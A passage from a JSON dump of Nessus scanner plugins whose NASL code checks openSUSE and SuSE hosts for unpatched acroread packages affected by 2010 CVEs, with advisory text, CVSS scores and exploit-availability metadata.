Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-2664.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47692);\n script_version(\"1.33\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0359-1)\");\n script_summary(english:\"Check for the acroread-2664 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1297, CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205,\nCVE-2010-2206, CVE-2010-2207, CVE-2010-2208, CVE-2010-2209,\nCVE-2010-2210, CVE-2010-2211, CVE-2010-2212).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-07/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-cmaps-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ja-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ko-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_CN-9.3.3-2.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_TW-9.3.3-2.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:42:58", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. 
The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 7087)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-7087.NASL", "href": "https://www.tenable.com/plugins/nessus/51701", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51701);\n script_version(\"1.32\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 7087)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The 
remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7087.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-cmaps-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ja-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ko-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_CN-9.3.3-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_TW-9.3.3-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:07", "description": "Specially crafted PDF 
documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 7086)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2011-01-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD_JA-7086.NASL", "href": "https://www.tenable.com/plugins/nessus/51713", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51713);\n script_version(\"1.32\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 7086)\");\n script_summary(english:\"Checks rpm output for the updated 
package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7086.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread_ja-9.3.3-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:48", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. 
The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2637 / 2641)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread_ja", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_ACROREAD_JA-100702.NASL", "href": "https://www.tenable.com/plugins/nessus/50886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50886);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : acroread (SAT Patch Numbers 2637 / 2641)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code. 
The fixed security issues have been\ntracked as :\n\n - CVE-2010-1297\n\n - CVE-2010-1240\n\n - CVE-2010-1285\n\n - CVE-2010-1295\n\n - CVE-2010-2168\n\n - CVE-2010-2201\n\n - CVE-2010-2202\n\n - CVE-2010-2203\n\n - CVE-2010-2204\n\n - CVE-2010-2205\n\n - CVE-2010-2206\n\n - CVE-2010-2207\n\n - CVE-2010-2208\n\n - CVE-2010-2209\n\n - CVE-2010-2210\n\n - CVE-2010-2211\n\n - CVE-2010-2212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1295.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1297.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2168.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2201.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2202.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2203.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2204.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2205.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2206.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2010-2207.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2208.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2212.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 2637 / 2641 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n 
